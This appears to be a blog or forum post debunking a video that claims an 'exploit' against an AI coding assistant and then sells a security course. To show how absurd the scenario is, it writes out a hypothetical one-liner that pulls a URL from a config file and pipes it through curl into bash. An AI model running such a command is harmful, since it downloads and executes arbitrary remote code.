There's a phenomenon of fraudulent "security researchers" that has sprung out of the AI world. I became aware of it when someone on Discord posted a video covering an "ACE exploit" against users of a particular AI coding assistant. The exploit was this (see the sketch below):

1. You accidentally grab a malicious config file for the assistant.
2. For some reason, you pipe this entire file into curl and then into bash.
3. This downloads and runs a script that sets up malware.
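
To make the absurdity concrete, here's roughly what the victim would have to do under the claimed scenario. The config path, URL extraction, and flags are hypothetical, since the video never showed a real chain:

```sh
# Step 1 (claimed): a malicious config file lands on your machine.
# The path is made up for illustration:
#   ~/.assistant/config.yaml  ->  contains an attacker-controlled URL

# Step 2 (claimed): you, for no stated reason, feed that config
# through curl and pipe the response straight into bash:
curl -sL "$(grep -o 'https://[^" ]*' ~/.assistant/config.yaml)" | bash

# Step 3 (claimed): whatever script that URL serves now runs with
# your privileges. At this point it isn't an exploit of the assistant
# at all; you've simply chosen to execute an arbitrary remote script.
```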

It didn't make sense at any point, but I was gripped by a need to know the intention behind such a worthless video. It made sense when the host started shilling his online course about how to be a "security researcher" like him. Not only that, paying members get premium first access to the latest "disclosures" that professional engineers are afraid to admit exist. It's likely that the creator of this bug report is building up their own repertoire of exploits that have been ignored. Or perhaps they're trying to put their course knowledge to use.